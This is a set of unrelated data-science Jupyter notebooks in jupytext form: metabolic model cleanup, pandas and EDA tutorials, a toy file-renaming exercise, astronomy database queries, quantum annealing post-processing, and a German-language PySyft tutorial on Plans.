bacillus.reactions.ACLDC

# Save & commit.
cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')

# I've spotted some metabolites with strange IDs still, which I will just fix here.
model = cobra.io.read_sbml_model('../../model/p-thermo.xml')

model.metabolites.HC01434_c.id = 'osuc_c'
model.metabolites.HC01435_c.id = '3c1ht_c'
model.metabolites.HC01651_c.id = 'fapnt_c'
model.metabolites.HC01652_c.id = 'dapnt_c'
model.metabolites.HC01672_c.id = 'aad_c'
model.metabolites.HC01710_c.id = 'dattoo_c'

# Save & commit.
cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')

# Additionally, memote cannot recognise ATP properly in our model, so copy the
# notes/annotation from E. coli iML1515.
model = cobra.io.read_sbml_model('../../model/p-thermo.xml')
model_e_coli = cameo.load_model('iML1515')

model.metabolites.atp_c.notes = model_e_coli.metabolites.atp_c.notes
model.metabolites.atp_c.annotation = model_e_coli.metabolites.atp_c.annotation

# Save & commit.
cobra.io.write_sbml_model(model,'../../model/p-thermo.xml')
notebooks/15. Finalizing mass balancing.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# <div style="width: 100%; overflow: hidden;">
# <div style="width: 150px; float: left;"> <img src="https://raw.githubusercontent.com/DataForScience/Networks/master/data/D4Sci_logo_ball.png" alt="Data For Science, Inc" align="left" border="0" width=150px> </div>
# <div style="float: left; margin-left: 10px;"> <h1>Transforming Excel Analysis into pandas Data Models</h1>
# <h1>Pandas DataFrames</h1>
# <p><NAME><br/>
# <a href="http://www.data4sci.com/">www.data4sci.com</a><br/>
# @bgoncalves, @data4sci</p></div>
# </div>

# +
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np

import watermark

# %load_ext watermark

# %matplotlib inline
# -

# We start by printing out the versions of the libraries we're using, for future reference
# %watermark -n -v -m -g -iv

# Set the default figure style
plt.style.use('./d4sci.mplstyle')

# ## DataFrames and Series

# Series and DataFrames can be thought of as dictionaries associating keys to lists of values
data = {"id": [23, 42, 12, 86], "Name": ["Bob", "Karen", "Kate", "Bill"]}
data

# A Series corresponds to just a single list of values
series = pd.Series(data["id"])
series

# While a DataFrame can have multiple
df = pd.DataFrame(data)
df

# Another way of looking at it is that DataFrames are essentially groups of individual
# Series. Each Series can have its own datatype **dtype**
df.dtypes

# We can get general information about how the DataFrame is being stored by calling __info()__
df.info()

# Subsetting a DataFrame by column name, we retrieve the underlying Series
type(df['id'])

# Both columns and index values have types and possibly names
df.columns

df.index

# And we can query the shape and number of dimensions of the DataFrame easily
df.shape

df.ndim

# And relabel both index and column values
df.index = ["row" + str(i) for i in range(4)]
df.columns = ['ID', 'First Name']

df.loc['row1']

df.iloc[1]

# ## Importing and exporting data

# ### Read csv files
# The file can be zipped
green = pd.read_csv('data/green_tripdata_2014-04.csv.gz',
                    parse_dates=['lpep_pickup_datetime', 'Lpep_dropoff_datetime'],
                    nrows=1000,
                    index_col='VendorID',
                    dtype={'RateCodeID':'str',
                           'Trip_type': 'str'}
                    )

# We read only 1000 rows, as expected
green.shape

# And the right dtypes were used for each column
green.info()

# ### Read excel spreadsheets
# By default, __read_excel__ reads the first spreadsheet
movies = pd.read_excel('data/movies.xlsx', index_col='Title', engine='openpyxl')
movies.head(10)

# But it preserves no information about the sheet name. An alternative is to use
dfs = pd.read_excel('data/movies.xlsx', sheet_name=None, engine='openpyxl')

# to retrieve a dictionary with all the available sheets keyed by name
len(dfs)

dfs.keys()

movies_1900 = dfs['1900s']
movies_1900.head()

# Or to select a specific worksheet directly by name
movies_2000 = pd.read_excel('data/movies.xlsx', sheet_name='2000s', engine='openpyxl')
movies_2000.head()

# If the cells contain formulas, pandas simply returns the current values (the current output of each formula)
mortgage = pd.read_excel('data/excel-mortgage-calculator.xlsx', skiprows=15, engine='openpyxl')
mortgage

# Wherever possible, dtypes are chosen according to the excel format specified
mortgage.info()

# ### ExcelFile
book = pd.ExcelFile('data/movies.xlsx')

# We can easily get a list of all worksheets
book.sheet_names

# We can easily parse a specific sheet and convert it to a DataFrame
df3 = book.parse('2000s')
df3.head()

# __parse__ supports most of the parameters available for read_excel
df4 = book.parse('2000s', index_col=0, usecols=['Title', 'Year', 'Director', 'Budget'])
df4.head()

# ### Web pages
# We're going to use the Wikipedia page with the current numbers of cases for CoVID-19
url = 'https://en.wikipedia.org/wiki/COVID-19_pandemic_by_country_and_territory'

# All we have to do is to provide the url
dfs = pd.read_html(url)

# Which retrieves all the tables in the page, in the order they appear
len(dfs)

# So the first one is the infobox on the top right hand corner
dfs[0]

# And the fifteenth one (index 14) is the number of cases and deaths per country
dfs[14].head()

# Due to the formatting of the table, pandas interpreted the first two rows to be the
# headers. We can fix this by explicitly telling it to use just the first row for the
# column headers
dfs = pd.read_html(url, header=0)
dfs[9]

# ## Subsetting
# The top/bottom N number of values are easy to access
movies.head(10)

movies.tail(2)

# And individual rows, which can be indexed by Name
# (note the trailing non-breaking space '\xa0' in the scraped titles)
movies.loc["Wild Wild West\xa0"]

# Or by position
movies.iloc[1336]

# Rows behave as named tuples, so you can access individual elements by position:
movies.iloc[1336, 10]

# Or by name
movies.iloc[1336].Budget

movies.loc['Wild Wild West\xa0', 'Director']

# Ranges can also be used with iloc
movies.iloc[1:4]

# And with __loc__ — with the important difference that loc automatically __includes__ the
# last value of the range, while iloc does not
movies.loc["Over the Hill to the Poorhouse\xa0":"Metropolis\xa0"]

# Since each column is just a numpy array, we can easily manipulate the values and create new columns
movies['Budget2'] = movies.Budget+42
movies[['Budget', 'Budget2']]

# We can also append new rows to the dataframe. Since we have 3 sheets that all follow the
# same format, we can just stack them together using __concat__:
df2 = pd.concat([movies, movies_2000])
df2

# __concat__ can also be used to place two DataFrames side by side
movies.shape

pd.concat([movies, movies], axis=1).shape

# ## Time Series
# Apple stock information from https://finance.yahoo.com/quote/AAPL/history
# We can automatically convert the Date column using __pd.read_csv__:
data = pd.read_csv('data/AAPL.csv', parse_dates=['Date'])
data.dtypes

# If we now set the Date column to be the index, we effectively create our first Time Series
data.set_index('Date', inplace=True)

# We see that pandas automatically generated a "DatetimeIndex" object that allows us to
# take advantage of the fact that we are dealing with dates
data.info()

# We can easily access parts of the date object
data

data.index.month

data.index.year

data.index.day

# And slice the DataFrame by date (as before, the last value is also included)
data.loc['2010':'2010-06-10'].round(2)

# ## DataFrame Manipulations
# map allows us to easily apply a function to the rows of a Series.
movies['Director'].head()

movies['Director'].map(lambda x: x.lower())

# For a dataframe we need to use transform
movies[['Duration', 'Budget']].head()

movies[['Duration', 'Budget']].transform(lambda x: x * 2)

# Or apply
movies[['Duration', 'Budget']].apply(np.sum, axis=0)

movies[['Duration', 'Budget']].apply(np.sum, axis=1)

# ## Merge and Join
# Define 2 toy DataFrames

# +
A = pd.DataFrame({"lkey": ["foo", "bar", "baz", "foo"],
                  "value": [1, 2, 3, 4]})

B = pd.DataFrame({"rkey": ["foo", "bar", "qux", "bar"],
                  "value": [5, 6, 7, 8]})
# -

# Merge allows us to join them by specifying an arbitrary column on each of them
A.merge(B, left_on="lkey", right_on="rkey", how="right")

# On the other hand, join performs the join using the respective Indices
A.set_index('lkey', inplace=True)
B.set_index('rkey', inplace=True)

A.join(B, lsuffix="_l", rsuffix="_r", how="inner")

# <div style="width: 100%; overflow: hidden;">
# <img src="data/D4Sci_logo_full.png" alt="Data For Science, Inc" align="center" border="0" width=300px>
# </div>
2. Pandas DataFrames.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# ## Thanos - project 1

# ### 1- function Thanos to read the files
import os
import random

# Work inside the 'assi-than' folder under the current directory.
# NOTE(review): uses a Windows-style '\\' separator; on POSIX this targets a literal
# 'cwd\assi-than' name — confirm the intended platform.
os.chdir(f'{os.getcwd()}\\assi-than')


def thanos_project(earth):
    """Return the list of entries (file names) in the directory *earth*."""
    people = os.listdir(earth)
    return people


# #### Try it by yourself
people = thanos_project(os.getcwd())
people


# ### 2- Renaming the files with random names:
def renaming():
    """Return a fresh random numeric name (as a string) not already used in the cwd.

    Bug fixes vs. the original:
    - the original looped ``len(people)`` times but returned inside the loop on the
      first pass (the loop was pointless), and raised UnboundLocalError when the
      directory was empty;
    - ``random.randint`` could produce a name already present in the directory, and
      ``os.rename`` silently replaces an existing destination on POSIX — destroying
      a file.  We now re-draw until the name is unused.
    """
    existing = set(os.listdir(os.getcwd()))
    name = str(random.randint(758694, 9458767))
    while name in existing:
        name = str(random.randint(758694, 9458767))
    return name


def random_names(lst):
    """Rename every file in *lst* (paths relative to the cwd) to a random name."""
    for i in lst:
        os.rename(i, renaming())


random_names(people)

# #### checkout the changes: BOOOOOOOM!!
people = thanos_project(os.getcwd())
people
thanos project1.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Task 4: Personal EDA - Kyle

import pandas as pd
import numpy as np
import seaborn as sns
import project_functions  # project-local helper module (relative import)
import matplotlib.pyplot as plt
import pandas_profiling as pdp
from pandas_profiling import ProfileReport

df = project_functions.load_and_process("../../data/raw/adult.data")
df

prof = ProfileReport(df)
prof.to_file(output_file='milestone2_data_overview.html')

# The code above creates a new html file called milestone2_data_overview.html which gives
# a brief overview of the dataframe: the types of variables and a description of those
# values, including the mean, distinct values, median, etc. This tool is very useful for
# fundamentally understanding the data we have without any complex analysis.

order = df['Education'].value_counts(ascending=False).index
sns.countplot(y="Education", order=order, data=df).set_title("Amount of Working Adults by Education")

# Distribution of the education level of working adults. Most working adults are only
# high-school graduates, followed by college-related experience (bachelor's, master's, or
# still in college). A group finished only junior high or lower, and a couple of people
# did not get any proper education past preschool.

order = df['Race'].value_counts(ascending=False).index
sns.countplot(y="Race", order=order, data=df).set_title("Amount of Working Adults by Race")

# Distribution of working adults' races. Most workers are white; the second-largest group
# is Black workers (fewer than 20% of the white count), followed by Asian workers, with
# other groups around the size of the Native American group in the data.

# +
h = sns.displot(df, x="Age", binwidth=1, hue="Race", multiple="stack", common_norm=False)
plt.title("Reported Working Adult Age by Race")
plt.xlabel("Age")
# BUG FIX: the y axis of a stacked count histogram is a count, not "Race"
# (the race split is carried by the hue legend).
plt.ylabel("Count")
# -

# How working adults' races spread over age. Diversity decreases with age, especially past
# the normal retirement age (~66-67). There is an outlier near the 90-year age group: more
# working adults around that age than between 82 and 88.

# ---
# **The code and results below show the distribution of salary across the various
# variables we have.**
# BUG FIX: the original copy-pasted the title "Amount of Working Adults by Race" onto
# every plot; each title now names the variable actually plotted.

sns.countplot(y="Workclass", data=df, hue="Salary").set_title("Amount of Working Adults by Workclass")

sns.countplot(y="Education", data=df, hue="Salary").set_title("Amount of Working Adults by Education")

sns.countplot(y="Marital Status", data=df, hue="Salary").set_title("Amount of Working Adults by Marital Status")

sns.countplot(y="Occupation", data=df, hue="Salary").set_title("Amount of Working Adults by Occupation")

sns.countplot(y="Relationship", data=df, hue="Salary").set_title("Amount of Working Adults by Relationship")

sns.countplot(y="Race", data=df, hue="Salary").set_title("Amount of Working Adults by Race")

sns.countplot(y="Sex", data=df, hue="Salary").set_title("Amount of Working Adults by Sex")

sns.countplot(y="Native Country", data=df, hue="Salary").set_title("Amount of Working Adults by Native Country")
analysis/kyle/milestone2.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Querying ALeRCE - Stamp Classifier # ```Author: <NAME>, Last updated 20210426``` # # Table of contents: # * [Querying the ALeRCE API Python Client](#api) # * [Replicating process with direct database query](#db) # * [Comparing API and DB outputs](#compare) # * [Understanding retrieved object data](#data) # * [Exporting to VOTable](#export) # **Goal:** # # 1) To query the ALeRCE database for objects with the following attributes: # * detected 24 - 48 hours from the current time # * classified by the stamp classifier (version 1.0.4) # # 2) To return a table consisting of ALeRCE alert objects that includes, per row: # * aggregated detection properties per object (e.g. mean RA/Dec, number of detections) # * probability of the highest ranking class assigned by the stamp classifier (v1.0.4) # # We will try this by querying the ALeRCE API first, and then directly querying the ZTF database. 
# + import sys import time # Packages for direct database access # # %pip install psycopg2 import psycopg2 import json # Packages for data and number handling import numpy as np import pandas as pd import math # Packages for calculating current time and extracting ZTF data to VOTable from astropy.time import Time from astropy.table import Table, unique, vstack from astropy.io.votable import from_table, writeto from datetime import datetime # Packages for display and data plotting, if desired from IPython.display import HTML from IPython.display import display import matplotlib.pyplot as plt # %matplotlib inline # - # Set up ALeRCE python client from alerce.core import Alerce client = Alerce() # ## Querying the ALeRCE API Python Client<a class="anchor" id="api"></a> # We will retrieve these objects per class, first by building a function that uses the ALeRCE client to query objects according to stamp classifier predictions. # # Note that according to the ZTF API (```ztf-api/api/sql/astro_object/astro_object.py```), the default ranking for ```query_objects``` when ranking is not specified is 1. 
# Define a function that queries objects of one class, as predicted by the stamp
# classifier v1.0.4, last detected within [min_lastmjd, max_lastmjd].
def query_class_objects(cn, min_lastmjd, max_lastmjd):
    """Return a pandas DataFrame of ALeRCE objects of class *cn* in the MJD window."""
    objects = client.query_objects(classifier = 'stamp_classifier',
                                   classifier_version = 'stamp_classifier_1.0.4',
                                   class_name = cn,
                                   lastmjd = [min_lastmjd, max_lastmjd],
                                   page_size = int(1e6),
                                   format='pandas')
    return objects

# +
# Querying the ALeRCE client for objects detected 24 - 48 hours from the current time,
# over a range of classes.
min_lastmjd = Time(datetime.today(), scale='utc').mjd - 2
max_lastmjd = Time(datetime.today(), scale='utc').mjd - 1

classes = ["AGN", "SN", "VS", "asteroid", "bogus"]

# Start timer
start = time.time()

# IMPROVED: the original seeded the accumulator with an astropy ``Table()`` (wrong type,
# immediately discarded) and concatenated inside the loop; collect the per-class frames
# in a list and concatenate once instead.
frames = []
for class_name in classes:
    frames.append(query_class_objects(class_name, min_lastmjd, max_lastmjd))
    print('Class queried: %s' % (class_name))
apiobjects = pd.concat(frames)
print('Done.')

# End timer
end = time.time()
print(f"Runtime of the program is {end - start}")
# -

# +
# Prints the dataframe shape: (number of selected objects, number of selected filters)
print(apiobjects.shape)

# Sorting detections by lastmjd, firstmjd, and OID in descending order
apiobjects = apiobjects.sort_values(by=['lastmjd', 'firstmjd', 'oid'], ascending=False)
apiobjects.head()
# -

# ## Replicating process with direct database query<a class="anchor" id="db"></a>

# +
# Open and load credentials
credentials_file = "../alercereaduser_v4.json"
with open(credentials_file) as jsonfile:
    params = json.load(jsonfile)["params"]

# Open a connection to the database
conn = psycopg2.connect(dbname=params['dbname'], user=params['user'],
                        host=params['host'], password=params['password'])
# -

# +
# IMPROVED: pass the MJD bounds as query parameters via read_sql_query's ``params``
# argument instead of %-interpolating them into the SQL string; the psycopg2 driver
# substitutes the ``%s`` placeholders safely.
query = '''
SELECT
    object.oid, object.meanra, object.meandec, object.sigmara, object.sigmadec,
    object.firstmjd, object.lastmjd, object.ndet,
    pr.classifier_name, pr.classifier_version, pr.class_name, pr.ranking, pr.probability
FROM object
INNER JOIN (
    SELECT probability.oid, probability.classifier_name, probability.classifier_version,
           probability.class_name, probability.ranking, probability.probability
    FROM probability
    WHERE probability.classifier_name = 'stamp_classifier'
    AND probability.classifier_version = 'stamp_classifier_1.0.4'
    AND probability.ranking = 1
) AS pr
ON object.oid = pr.oid
WHERE object.lastMJD >= %s
AND object.lastMJD <= %s
'''

# Outputs as a pd.DataFrame
dbobjects = pd.read_sql_query(query, conn, params=(min_lastmjd, max_lastmjd))
# -

# +
# Prints the dataframe shape: (number of selected objects, number of selected filters)
print(dbobjects.shape)

# Sorting detections by lastMJD in descending order
dbobjects = dbobjects.sort_values(by=['lastmjd', 'firstmjd', 'oid'], ascending=False)
dbobjects.head()
# -

# ## Comparing API and DB outputs<a class="anchor" id="compare"></a>

# Check that the OIDs of each row in the API table are identical to that of the
# corresponding row in the DB table
print(set(dbobjects['oid'].values==apiobjects['oid'].values))

# Check if each row corresponds to a unique OID
print(dbobjects['oid'].is_unique)

# ## Understanding retrieved object data<a class="anchor" id="data"></a>

# For this, we'll only look at the dataframe retrieved from the API client (which is
# alright, as the ```dbobjects``` and ```apiobjects``` dataframes encompass the same OIDs.)
# The following prints out the number of OIDs that correspond to each class name: # Count number of OIDs that correspond to each class name print('Total rows : %i' % (len(apiobjects.index))) obj_classes = apiobjects.groupby('class') for key in obj_classes.groups.keys(): l = obj_classes.groups[key].size print('%s : %i' % (key, l)) # + # Identify duplicate OID entries - rows with same OID but different classes and probabilities obj_oid = apiobjects.groupby(['oid']) duplicates = [] for key in obj_oid.groups.keys(): l = obj_oid.groups[key].size if l > 1: oid = key duplicates.append(oid) print('Number of duplicate OIDs: %i' % (len(duplicates))) print('Number of unique OIDs : %i' % len(obj_oid)) # Print example rows with duplicate OIDs if len(duplicates) > 0: display(apiobjects[(apiobjects['oid']==duplicates[0])]) # - # ## Exporting to VOTable <a class="anchor" id="export"></a> # # To save this data as a VOTable requires converting it from its current form (a ```pd.DataFrame```). This is possible with the ```Table``` object from ```astropy.table```, and the functions we initially imported from ```astropy.io.votable```. Essentially, we'll convert our ```pd.DataFrame``` to an ```astropy.table.Table``` to a ```astropy.io.votable.VOTableFile```, which can then be exported. # # _A buggy caveat, however_ -- ```astropy.io.votable.VOTableFile``` objects throw an error when you attempt to pass on masked/```NaN``` values. I've gotten around this, for now, by filling in the masked values the the _string_ ```"None"``` before the ```pd.DataFrame``` is converted to a ```Table```. 
# Defining a function that allows you to export the dataframe into a VOTable def export_object_data(objects, filename): # Filling the masked values with the string 'NaN' objects_filled = objects.fillna('None') # Converting filled dataframe to astropy Table, then astropy VOTableFile, then exporting into .xml full_dt = Table.from_pandas(objects_filled) votable = from_table(full_dt) writeto(votable, filename) export_object_data(apiobjects, "VOTables/ztf_api_stamp_objects.xml")
example_notebooks/ZTF_Stamps_API-DB_Query.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: conda_braket
#     language: python
#     name: python3
# ---

# # Step 4: Post-processing
#
# In this part we post-process the optimization results for evaluation and visualization.
# First, we prepare the following parameters.
# NOTE(review): several names used below (raw_path, data_path, s3_bucket, prefix,
# qa_task_id) are expected to be defined by the earlier workshop notebooks — confirm
# they are in scope before running this one.
#
# | parameter | description | value |
# |---|---|---|
# | method | annealing method for the QUBO problem | 'dwave-sa': simulated annealer from the Ocean toolkit<br>'dwave-qa': quantum annealer |
# | raw_path | path of the raw molecule file | './molecule-data/117_ideal.mol2' in this example |
# | data_path | path of the processed molecule file | './qmu_117_ideal_data_latest.mol2' in this example |
# | bucket | S3 bucket to store results | - |
# | prefix | folder name inside the S3 bucket | - |
# | task_id | your quantum annealing task id | '2b5a3b05-1a0e-443a-852c-4ec422a10e59' in this example |

# Then we can run the post-processing for SA using the **ResultParser** object:

# +
from utility.MoleculeParser import MoleculeData
from utility.QMUQUBO import QMUQUBO
from utility.AnnealerOptimizer import Annealer
from utility.ResultProcess import ResultParser
import time

timestamp = time.strftime("%Y%m%d-%H")
# +
method = "dwave-sa"
sa_param = {}
sa_param["raw_path"] = raw_path
sa_param["data_path"] = data_path

sa_process_result = ResultParser(method, **sa_param)
# print(f"{method} result is {sa_process_result.get_all_result()}")

local_time, _ , _, _= sa_process_result.get_time()

print(f"time for {method}: \n \
local time is {local_time}")
# -

sa_atom_pos_data = sa_process_result.generate_optimize_pts()
# save unfold file for visualization and parameters for experiment: 1. volume value 2. relative improvement
sa_process_result.save_mol_file(f"{timestamp}")

sa_process_result.parameters

# In the first block we can see the **local time** for SA is about 174 seconds. With the
# **generate_optimize_pts()** method, the final unfolded 3D points are generated and saved
# as a json file and a mol2 file. The last block shows the optimization results (also
# stored in the json file): the volume increases by a factor of 1.0212. The
# **unfolding_results** values indicate that rotatable bond 15 should be rotated by 270
# degrees (360/8*(7-1)) and rotatable bond 14 by 315 degrees (360/8*(8-1)).

# Meanwhile, you can run the post-processing for QA:

# +
method = "dwave-qa"
qa_param = {}
qa_param["bucket"] = s3_bucket
qa_param["prefix"] = prefix
qa_param["task_id"] = qa_task_id
qa_param["raw_path"] = raw_path
qa_param["data_path"] = data_path

qa_process_result = ResultParser(method, **qa_param)
# print(f"{method} result is {qa_process_result.get_all_result()}")

local_time, task_time, total_time, access_time = qa_process_result.get_time()

print(f"time for {method}: \n \
local time is {local_time},\n \
task time is {task_time}, \n \
qpu total time is {total_time}, \n \
qpu access time is {access_time}")
# -

# There are several time metrics for running QA. This task's **local time** is 7.7
# seconds — the time to call the API and get the annealing result. The **task time** is a
# metric from the json file stored in the bucket. **qpu total time** and **qpu access
# time** represent the actual time spent in the QPU; see "Operation and Timing"
# (https://docs.dwavesys.com/docs/latest/c_qpu_timing.html) for details.

qa_atom_pos_data = qa_process_result.generate_optimize_pts()
# save unfold file for visualization and parameters for experiment: 1. volume value 2. relative improvement
qa_process_result.save_mol_file(f"{timestamp}")

qa_process_result.parameters

# Similarly, the optimized result is converted into 3D points and saved as local json and
# mol2 files. QA likewise obtains about a 1.021x volume increase.
#
# Finally, we can open the folder with the optimized results:
#
# ![optimize-results](../../../images/optimize-results.png)
#
# <center>Optimized results</center>
#
# The json results and mol2 files of SA and QA are each stored here; running more
# experiments accumulates more timestamped results. We can upload the result
# **117_ideal_dwave-qa_20220216-05.mol2** into the online viewer
# (https://www.rcsb.org/3d-view) to inspect it:
#
# ![visual](../../../images/visualization.png)
#
# <center>Visualization</center>
docs/zh/workshop/a-molecular-unfolding/post-process.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Part 8 - Introduction to Plans
#
# ### Context
#
# This notebook introduces an object that is crucial for scaling Federated Learning to
# industrial settings: the Plan. It dramatically reduces the required bandwidth, enables
# asynchronous schemes and grants remote workers more autonomy. The original concept of
# Plans can be found in the paper
# ["Towards Federated Learning at Scale: System Design"](https://arxiv.org/pdf/1902.01046.pdf);
# here it has been adapted to the needs of the PySyft library.
#
# A Plan is intended to store a sequence of Torch operations. In that it resembles a
# function, but it can send this sequence to remote workers while keeping a reference to
# it. A sequence of n operations, together with the associated pointers, can thus be
# transmitted in a single message instead of one message per operation. It is even
# possible to ship fixed tensors (so-called _state tensors_) along with it for extended
# functionality. Plans can be understood either as a function to be sent, or as a class
# that can be sent and executed. At the highest level, users can treat Plans as a magic
# capability that runs sequences of Torch functions on remote devices.
#
# An important note: the set of functions usable in Plans is currently still limited to
# sequences of Torch operations. In particular this excludes logical structures such as
# `if`, `for` and `while`, although workarounds are being developed. _Strictly speaking,
# logical statements CAN be included, but the first evaluation of the statement determines
# how it is executed on every subsequent run. In most cases this behaviour is not what you
# want._
#
# Authors:
# - <NAME> - Twitter [@theoryffel](https://twitter.com/theoryffel) - GitHub: [@LaRiffle](https://github.com/LaRiffle)
# - <NAME> - Twitter [@bobbyawagner](https://twitter.com/bobbyawagner) - GitHub: [@robert-wagner](https://github.com/robert-wagner)
# - <NAME> - Twitter [@hereismari](https://twitter.com/hereismari) - GitHub: [@mari-linhares](https://github.com/mari-linhares)
#
# Translator:
# - <NAME> - Github: [@JMBehnken](https://github.com/JMBehnken)

# ### Imports and model specifications
#
# First, the official imports.
import torch
import torch.nn as nn
import torch.nn.functional as F

# Then the PySyft-specific imports. One important note: **a local worker should not be a
# client worker.** *Only non-client workers can store objects, which is essential for the
# ability to execute a Plan.*

# +
import syft as sy  # import the Pysyft library
hook = sy.TorchHook(torch)  # hook PyTorch ie add extra functionalities

# IMPORTANT: Local worker should not be a client worker
hook.local_worker.is_client_worker = False

server = hook.local_worker
# -

# The remote workers, or _devices_, are named following the scheme from the referenced
# paper. Each worker is then populated with some data.

# +
x11 = torch.tensor([-1, 2.]).tag('input_data')
x12 = torch.tensor([1, -2.]).tag('input_data2')
x21 = torch.tensor([-1, 2.]).tag('input_data')
x22 = torch.tensor([1, -2.]).tag('input_data2')

device_1 = sy.VirtualWorker(hook, id="device_1", data=(x11, x12))
device_2 = sy.VirtualWorker(hook, id="device_2", data=(x21, x22))
devices = device_1, device_2
# -

# ### Basic example
#
# We define a function that will subsequently be converted into a Plan. To achieve this,
# it is enough to put the appropriate decorator above the function!
@sy.func2plan()
def plan_double_abs(x):
    x = x + x
    x = torch.abs(x)
    return x

# A check confirms the conversion succeeded.
plan_double_abs

# To use a Plan, two things must be completed:
# - building the Plan (_recording the sequence of operations in the function_)
# - sending the Plan to a worker / device
#
# #### Building the Plan
#
# To build the Plan, it only has to be called with some data.
#
# We start by requesting some data: a request is sent over the network and a reference
# pointer to the data is returned.
pointer_to_data = device_1.search('input_data')[0]
pointer_to_data

# Trying to execute the Plan on the data of device `location:device_1` would raise an
# error, because the Plan has not been built yet.
plan_double_abs.is_built

# Sending non-built Plan will fail
try:
    plan_double_abs.send(device_1)
except RuntimeError as error:
    print(error)

# To build the Plan, it only needs to be called with the required arguments (a.k.a. some
# data) via the `build` method. Once built, the Plan has executed all the chained commands
# and stored them in its `actions` attribute!
plan_double_abs.build(torch.tensor([1., -2.]))

plan_double_abs.is_built

# Sending the Plan now works!
# This cell is executed successfully pointer_plan = plan_double_abs.send(device_1) pointer_plan # Genau wie bei Tensoren, wird ein Pointer auf das gesendete Objekt zurückgegeben. In diesem Falle ist es ein `PointerPlan`. # Es ist wichtig sich in Erinnerung zu rufen, dass beim Bauen des Plans alle Ids der Speicherorte für die Ergebnisse festgelegt werden, bevor die eigentlichen Berechnungen starten. Dies ermöglicht ein asynchrones senden der Befehle, da ein Referenz Pointer zurückgegeben wird, bevor die Berechnungen auf dem Helfer abgeschlossen sind. Somit lässt sich mit lokalen Befehlen fortfahren, ohne auf den Helfer warten zu müssen. Eine wichtige Anwendung dafür ist z. B. das Starten einer Berechnung eines Daten-Batches auf Gerät_1 und ohne auf das Ergebnis abwarten zu müssen, kann auf Gerät_2 ein weiterer Daten-Batch bearbeitet werden. # #### Starten eines Planes aus der Ferne # # Der Plan kann nun aus der Ferne gestartet werden, indem der Pointer zum Plan mit einem Pointer zu den Daten aufgerufen wird. Dies veranlasst die Ausführung des Plans und die Ergebnisse werden an den vorher festgelegten Orten abgelegt. Ein Pluspunkt ist, dass alles nur einer einzigen Kommunikationsrunde bedurfte. # # Das Ergebnis ist ein einfacher Pointer, wie er schon von den normalen Torch Funktionen bekannt ist! pointer_to_result = pointer_plan(pointer_to_data) print(pointer_to_result) # Dieses Ergebnis kann einfach zurückgeholt werden. pointer_to_result.get() # ### Einem konkreten Beispiel entgegen # # Eigentlich soll solch ein Plan jedoch für Deep und Federated Learning genutzt werden, nicht wahr? Lassen Sie uns ein komplizierteres Beispiel mit einem Neuronalen Netzwerk betrachten. # Anzumerken ist, dass nun eine Klasse in einen Plan übertragen wird. Dies kann erreicht werden, indem die neue Klasse von der `sy.Plan` Klasse erbt (anstelle des üblichen `nn.Module`). 
class Net(sy.Plan): def __init__(self): super(Net, self).__init__() self.fc1 = nn.Linear(2, 3) self.fc2 = nn.Linear(3, 2) def forward(self, x): x = F.relu(self.fc1(x)) x = self.fc2(x) return F.log_softmax(x, dim=0) net = Net() net # Der Plan wird mit einigen Pseudo-Daten gebaut. net.build(torch.tensor([1., 2.])) # Nun wird der Plan an den ferngesteuerten Helfer gesendet. pointer_to_net = net.send(device_1) pointer_to_net # Anschließend werden noch einige Daten benötigt. pointer_to_data = device_1.search('input_data')[0] # Die Syntax ist nun identisch zum normalen Ausführen von Befehlen auf der lokalen Maschine. Verglichen mit der klassischen Fernsteuerung wird jedoch nur eine einzige Kommunikationsrunde für die Ausführung benötigt. pointer_to_result = pointer_to_net(pointer_to_data) pointer_to_result # Das Ergebnis lässt sich wie gewöhnlich erhalten! pointer_to_result.get() # Et voilà! Die Kommunikation zwischen lokaler Maschine (oder dem Server) und dem ferngesteuerten Gerät konnte dramatisch reduziert werden. # ### Wechseln zwischen Helfern # # Eine weitere wichtige und wünschenswerte Fähigkeit ist das Wiederverwenden des Planes auf mehreren Helfern mit unterschiedlichen Daten-Batches. # Ein Neubau des Planes beim Wechsel des Helfers soll hierbei vermieden werden. Im Folgenden wird das obrige Beispiel daraufhin angepasst. class Net(sy.Plan): def __init__(self): super(Net, self).__init__() self.fc1 = nn.Linear(2, 3) self.fc2 = nn.Linear(3, 2) def forward(self, x): x = F.relu(self.fc1(x)) x = self.fc2(x) return F.log_softmax(x, dim=0) # + net = Net() # Build plan net.build(torch.tensor([1., 2.])) # - # Dies sind die wichtigsten Schritte die auszuführen waren. 
